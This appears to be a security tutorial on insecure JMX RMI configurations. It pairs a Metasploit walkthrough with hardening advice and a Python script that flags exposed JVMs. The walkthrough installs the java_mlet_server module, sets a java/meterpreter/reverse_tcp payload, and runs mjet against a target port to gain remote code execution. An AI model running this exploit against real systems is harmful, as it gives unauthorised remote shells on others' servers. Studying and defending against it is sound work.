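JMX (Java Management Extensions) is a framework for adding management functionality to applications, devices, systems, and so on. JMX can span a range of heterogeneous operating system platforms, system architectures, and network transport protocols, allowing flexible development of seamlessly integrated system, network, and service management applications.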

Java Management Extensions (JMX) Technology



Disabling Security
To disable both password authentication and SSL (namely to disable all security), you should set the following system properties when you start the Java VM.

Caution - This configuration is insecure: any remote user who knows (or guesses) your port number and host name will be able to monitor and control your Java applications and platform. Furthermore, possible harm is not limited to the operations you define in your MBeans. A remote client could create a MBean and use it to create new MBeans from arbitrary URLs, at least if there is no security manager. In other words, a rogue remote client could make your Java application execute arbitrary code.

Consequently, while disabling security might be acceptable for development, it is strongly recommended that you do not disable security for production systems.


This module takes advantage of a Java JMX interface insecure configuration, which would allow loading classes from any remote (HTTP) URL. JMX interfaces with authentication disabled ( should be vulnerable, while interfaces with authentication enabled will be vulnerable only if a weak configuration is deployed (allowing to use, having a security manager allowing to load a ClassLoader MBean, etc


The exploit tool mjet can be used. For the procedure, refer to JMX RMI Exploit Demo.


git clone

Copy the "MBean" folder to "data/java/metasploit"
Copy java_mlet_server.rb to "modules/exploits/multi/misc/"

In Kali 1.1.0, the Metasploit path is /opt/metasploit/apps/pro/msf3


msf exploit(java_mlet_server) > use exploit/multi/misc/java_mlet_server 
msf exploit(java_mlet_server) > set payload java/meterpreter/reverse_tcp 
payload => java/meterpreter/reverse_tcp
msf exploit(java_mlet_server) > set LHOST
msf exploit(java_mlet_server) > set LPORT 29999
LPORT => 29999
msf exploit(java_mlet_server) > run
[*] Exploit running as background job.
[*] Started reverse handler on 
msf exploit(java_mlet_server) > [*] Using URL:
[*]  Local IP:
[*] Server started.

Obtain the payload URL and use it as the -u parameter.

java -jar mjet/mjet.jar -p 9090 -u -t


Image from: JMX RMI Exploit example


So it’s important to keep in mind that setting java.rmi.server.hostname has no effect on whether or not this is an insecure configuration. If you actually want to secure your JMX RMI port, you have many options, such as (in decreasing order of preference):

Don’t pass This will start a local-only JMX server, and you can get the connection address from
Enable SSL client certificate authentication
Enable password authentication and use SSL
Firewall your JMX RMI port
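
An added example (not from the original page or the sources it quotes): a Python check that classifies a JVM command line against the options listed above, and shows that java.rmi.server.hostname does not change the verdict. It assumes the standard com.sun.management.jmxremote.* system properties and their documented defaults (authentication and SSL on once a port is set); the command lines in SAMPLES are constructed.

```python
import shlex

PREFIX = "-Dcom.sun.management.jmxremote"
# Documented defaults that apply once a remote port is configured.
DEFAULTS = {"authenticate": "true", "ssl": "true", "ssl.need.client.auth": "false"}


def jmx_properties(cmdline):
    """Collect com.sun.management.jmxremote.* properties from a JVM command line."""
    props = {}
    for arg in shlex.split(cmdline):
        if arg.startswith(PREFIX + "."):
            key, _, value = arg[len(PREFIX) + 1:].partition("=")
            props[key] = value.strip().lower()
    return props


def classify(cmdline):
    """Return the JMX exposure level; java.rmi.server.hostname is deliberately ignored."""
    props = jmx_properties(cmdline)
    if "port" not in props:
        return "local-only"            # no remote connector is started
    cfg = {**DEFAULTS, **props}
    auth = cfg["authenticate"] == "true"
    ssl = cfg["ssl"] == "true"
    if ssl and cfg["ssl.need.client.auth"] == "true":
        return "ssl-client-cert"
    if auth and ssl:
        return "password+ssl"
    if auth:
        return "password-cleartext"    # credentials cross the network unencrypted
    return "unauthenticated"           # the configuration the caution above describes


# Constructed sample command lines (not taken from a real host).
OPEN = ("java -Dcom.sun.management.jmxremote.port=9090 "
        "-Dcom.sun.management.jmxremote.authenticate=false "
        "-Dcom.sun.management.jmxremote.ssl=false -jar app.jar")
SAMPLES = [
    "java -jar app.jar",
    OPEN,
    OPEN.replace("-jar", "-Djava.rmi.server.hostname=127.0.0.1 -jar"),
    "java -Dcom.sun.management.jmxremote.port=9090 "
    "-Dcom.sun.management.jmxremote.ssl.need.client.auth=true -jar app.jar",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(f"{classify(line):20} {line}")
```

Feeding it the output of a process listing (one command line per call) gives a quick inventory of which JVMs on a host need their JMX settings changed.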


Exploiting JMX RMI